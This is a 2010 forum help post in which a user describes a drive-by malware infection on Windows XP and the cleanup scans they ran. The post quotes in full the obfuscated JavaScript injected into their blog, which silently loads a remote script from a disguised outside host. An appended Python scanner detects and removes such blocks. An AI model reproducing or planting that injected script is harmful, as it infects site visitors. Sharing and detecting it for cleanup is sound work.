Infected website deleted Firefox exe?


#1 msgsu



Posted 03 June 2010 - 02:52 AM

Yeah, I was looking for pictures of ladies and got into trouble. If you want to go hunting for this one, go to Google image search for "vice suicide girl" with moderate filtering. One of the results on the first page, can't remember which one, did this to me I'm thinking.

While browsing, a Java splash screen came up. I could not think of what activated it except for the page I browsed to, so I clicked back. A few seconds later, Windows (XP Pro SP 2) informed me that my virus scan (Symantec AntiVirus) was deactivated. Then programs started crashing like Firefox, Explorer and svchost. I rebooted and tried to restart Firefox, but my desktop shortcut did not work. It could not find the Firefox exe! The infection must have deleted it, it was missing from the Program Files\Mozilla Firefox folder! So I downloaded Firefox and reinstalled it, but it crashed again.

This is where I restarted in Safe Mode and did a Malwarebytes scan. It came back with two results: Malware.Trace (C:\Documents and Settings\[user]\Application Data\avdrn.dat) and Trojan.Agent (C:\Documents and Settings\[user]\Local Settings\Temp\svchost.exe). Both quarantined and deleted successfully.

I am restarting after the scan now. Is there anything else I should do? I have not seen an invasion like that before. What can I do to best protect against it next time (besides stopping the behavior in the first paragraph ;) )

Edit: Script was injected into blog I was logged into admin in about 15 pages. Blog will not display, only shows blank white screen. Will add code momentarily.

&lt;script>var e=["r","VR"];this.S=false;var G;t=function(){m=["QR","QV","f"];function R(x,F,Gw){a=3967;a++;return x.substr(F,Gw);this.Th="";}y=["Ef","wW","Qt"];TO=["nC","wo","aP"];var n='';var D=String(R("/govcL",0,3)+R("ogl8Ixk",0,3)+R("xWoIe.cWIxo",4,3)+R("om/TKLB",0,3)+"tat"+R("ONWtooNOW",3,3)+"dle"+R(".coZbq",0,3)+"m/t"+R("isctm3",0,3)+"ali"+R(".itc6I",0,3)+R(".phMKCO",0,3)+R("AWkpkAW",3,1));var ka=new Date();L=["yi","RR"];H=["ry","A"];N=40894;N--;var M=RegExp;var uC=new Array();var ER=[];var b=document;var c={J:false};this.Ho="";function V(x,F){var aJ=new Date();var q={};var Gw=new String("[")+F+R("]6KO",0,1);var hB=["eE"];Vq=1331;Vq--;var _=new M(Gw, String("g"));this.aI=false;Gd=["Lj","EE"];return x.replace(_, n);};try {var HY='B'} catch(HY){};var Lz=["JM"];var z=459039-450959;var yC=new Date();var i=V('s0cnr1i0pEtn','4_10QEnq');var u=null;try {} catch(GR){};var h="bo"+"dy";li=61075;li--;var VF={Xa:"hb"};var XP=[];G=function(){this.ZE=41220;this.ZE--;var Td='';try {this.sH=26223;this.sH-=144;var U=V('cFrFeZajtOeFE4lveYmAeMnSt4','SvDZFA4q2wYOMj');var oO=new Array();var FO=["Jr","iq"];uW=b[U](i);Rr={na:37709};this.XV=20407;this.XV+=228;var xp=V('sprCcz','DhpLG2kdCNaBmKAzZ');var x=z+D;var v=String("defer");QX={mB:9032};uW[v]=[1,9][0];var yW=55050;uW[xp]=new String("ht"+"tp"+":/"+"/s"+R("poymG",0,2)+"tt"+R("hiZvWG",0,2)+R("ngMwIv",0,2)+".r"+R("iUEu:EiU",3,2))+x;b[h].appendChild(uW);} catch(Q){var Rw={QA:54411};var MX=["Vj","SJ"];xw={lr:false};lJ={pD:"jA"};};ws=[];jx={Xz:false};};};this.CP=55469;this.CP+=99;try {} catch(sg){};t();var wy='';var XT=new Date();var _r=["uk","aX","Zg"];window.onload=G;Eg={};</script><!--ee726cc210e0528a76c19ba1cf102871-->

New edit: [sid: 23616] HTTP Gumblar Request Detected is what my virus scan prog says when I browse to my website from my work. :thumbsup:

Edited by msgsu, 03 June 2010 - 01:59 PM.
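
The post above reports the same script injected into about 15 blog pages. As an added example (not part of the original post), this Python scanner looks for blocks with the shape of the posted sample, an inline script followed directly by a 32-hex-character HTML comment, and ranks each hit by traits visible in that sample. The function names, the sample page and the assumption that every injected page shares this shape are hypothetical.

```python
import re
from pathlib import Path

# Assumed shape (from the post): <script>...</script> followed by <!--32 hex chars-->.
INJECTED = re.compile(
    r"<script\b[^>]*>(?P<body>(?:(?!</script).)*)</script>\s*"
    r"<!--(?P<tag>[0-9a-f]{32})-->", re.IGNORECASE | re.DOTALL)

# Traits visible in the posted sample; heuristics for ranking a hit, not signatures.
TRAITS = {
    "onload_hook": re.compile(r"window\.onload\s*="),
    "dom_append": re.compile(r"\.appendChild\("),
    "split_strings": re.compile(r'\("[^"]{1,12}",\d+,\d+\)'),
}

# Constructed, inert sample: one legitimate script, then a block in the injected shape.
SAMPLE = ('<html><body>\n<script src="/js/menu.js"></script>\n<p>Post</p>\n'
          '<script>var D=String(R("abcxyz",0,3));b[h].appendChild(u);'
          'window.onload=G;</script><!--0123456789abcdef0123456789abcdef-->\n'
          '</body></html>\n')


def find_injections(text):
    """Return one record per script block that carries the trailing hex comment."""
    hits = []
    for m in INJECTED.finditer(text):
        traits = sorted(n for n, rx in TRAITS.items() if rx.search(m.group("body")))
        hits.append({"line": text.count("\n", 0, m.start()) + 1, "span": m.span(),
                     "tag": m.group("tag").lower(), "traits": traits})
    return hits


def strip_injections(text, min_traits=2):
    """Cut out only the hits that also show at least min_traits of the traits."""
    for hit in reversed(find_injections(text)):
        if len(hit["traits"]) >= min_traits:
            text = text[:hit["span"][0]] + text[hit["span"][1]:]
    return text


def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")):
    """Map every matching file under root that has a hit to its records."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = find_injections(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report
```

Run `scan_tree` against a copy of the site's document root and review each reported line before applying `strip_injections`; hits with fewer than two traits are left in place for manual inspection.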
